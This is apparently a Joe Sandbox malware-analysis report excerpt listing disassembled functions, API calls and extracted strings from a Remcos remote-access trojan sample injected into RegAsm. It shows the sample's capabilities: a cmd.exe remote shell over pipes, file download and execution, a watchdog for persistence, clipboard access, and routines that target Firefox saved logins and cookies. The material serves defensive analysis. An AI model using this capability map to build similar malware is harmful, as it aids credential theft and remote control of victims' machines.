                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                • String ID:
                                                                • API String ID: 806969131-0
                                                                • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                APIs
                                                                  • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                • String ID:
                                                                • API String ID: 806969131-0
                                                                • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                APIs
                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                  • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                  • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                • String ID:
                                                                • API String ID: 2948481953-0
                                                                • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                                • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                                APIs
                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: __crt_fast_encode_pointer
                                                                • String ID:
                                                                • API String ID: 3768137683-0
                                                                • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __alldvrm
                                                                • String ID:
                                                                • API String ID: 65215352-0
                                                                • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                APIs
                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID:
                                                                • API String ID: 724789610-0
                                                                • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                APIs
                                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Deallocatestd::_
                                                                • String ID:
                                                                • API String ID: 1323251999-0
                                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: recv
                                                                • String ID:
                                                                • API String ID: 1507349165-0
                                                                • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: send
                                                                • String ID:
                                                                • API String ID: 2809346765-0
                                                                • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32 ref: 0041CB68
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                • API String ID: 1067849700-181434739
                                                                • Opcode ID: 36c4c716138eafb65366924a739a3da03ec63e0fe725df44d5f022929fa74a77
                                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                • Opcode Fuzzy Hash: 36c4c716138eafb65366924a739a3da03ec63e0fe725df44d5f022929fa74a77
                                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                • API String ID: 2994406822-18413064
                                                                • Opcode ID: b423d8e08fb893e8383836c5af32858413a78b929626fa58ba14b24f70300a4b
                                                                • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                • Opcode Fuzzy Hash: b423d8e08fb893e8383836c5af32858413a78b929626fa58ba14b24f70300a4b
                                                                • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                APIs
                                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                  • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                • OpenMutexA.KERNEL32 ref: 00412181
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                • API String ID: 3018269243-13974260
                                                                • Opcode ID: 2205b3d103f08f6d55fa3a4c0d872f48598f397e46eb09d3558a5a12db7084c4
                                                                • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                • Opcode Fuzzy Hash: 2205b3d103f08f6d55fa3a4c0d872f48598f397e46eb09d3558a5a12db7084c4
                                                                • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                • API String ID: 1164774033-3681987949
                                                                • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 004168FD
                                                                • EmptyClipboard.USER32 ref: 0041690B
                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                • GlobalLock.KERNEL32 ref: 00416934
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                • SetClipboardData.USER32 ref: 00416973
                                                                • CloseClipboard.USER32 ref: 00416990
                                                                • OpenClipboard.USER32 ref: 00416997
                                                                • GetClipboardData.USER32 ref: 004169A7
                                                                • GlobalLock.KERNEL32 ref: 004169B0
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                • String ID: !D@
                                                                • API String ID: 3520204547-604454484
                                                                • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$Close$File$FirstNext
                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 3527384056-432212279
                                                                • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                APIs
                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
